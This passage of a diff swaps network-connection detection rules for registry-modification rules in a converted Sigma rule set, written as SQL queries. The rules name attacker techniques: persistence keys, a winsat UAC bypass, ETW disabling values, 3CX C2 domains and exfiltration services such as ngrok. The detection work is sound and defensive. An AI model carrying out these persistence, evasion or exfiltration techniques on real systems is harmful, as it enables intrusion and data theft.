'10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control" + "attack.persistence" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "Suspicious Typical Malware Back Connect Ports", - "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((NewProcessName LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "net_connection_win_malware_backconnect_ports.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_mal_adwind.yml" }, { - "title": "Excel Network Connections", - "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "status": "experimental", - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1203" + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_excel_outbound_network_connection.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", - "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "status": "test", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "Persistence Via Disk Cleanup Handler - Autorun", + "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '3389' AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (NewValue LIKE '%cmd%' ESCAPE '\\' OR NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%wsl%' ESCAPE '\\' OR NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", - "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Registry Modification to Hidden File Extension", + "id": "5df86130-4e95-4a54-90f7-26541b40aec2", + "status": "test", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate use of ngrok" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)')))" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_hidden_extention.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "status": "experimental", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "Dllhost Internet Connection", - "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", "status": "test", - "description": "Detects Dllhost that communicates with public IP addresses", - "author": "bartblaze", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' 